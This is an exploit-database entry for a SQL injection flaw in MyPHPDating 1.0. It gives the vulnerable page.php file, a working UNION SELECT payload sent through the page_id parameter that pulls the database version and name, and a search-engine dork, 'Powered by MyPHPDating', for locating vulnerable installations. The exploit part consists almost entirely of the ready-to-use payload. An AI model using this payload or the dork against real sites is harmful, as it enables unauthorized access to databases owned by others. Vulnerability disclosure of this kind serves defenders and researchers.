MyPHPDating 1.0 SQL Injection Vulnerability

2012-01-02T00:00:00
ID 1337DAY-ID-17324
Type zdt
Reporter ITTIHACK
Modified 2012-01-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            MyPHPDating 1.0 SQL Injection Vulnerability  \
==============================================\__________________________
       Software : MyPHPDating version 1.0                                \
       Date     : 1/1/2012                                                \
       Vendor   : http://www.phponlinedatingsoftware.com/                  \
       Demo     : http://www.phponlinedatingsoftware.com/demo.htm           \
       Get App. : http://www.phponlinedatingsoftware.com/order.htm           \
       Price    : $149.00                                                     \
       Dork     : "Powered by MyPHPDating"                                     \
       Author   : ITTIHACK                                                      \
       Home     : http://ittihack.com                                            \               
==================================================================================               
                                                                                  |_______________________________________|
Vulnerable file : page.php                                                                                                |
Exploit         : http://localhost/[path]/page.php?page_id=[SQL]                                                          |
                  http://localhost/[path]/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--    |
==========================================================================================================================|
 
  
 Greatz to: Reinie



#  0day.today [2018-03-14]  #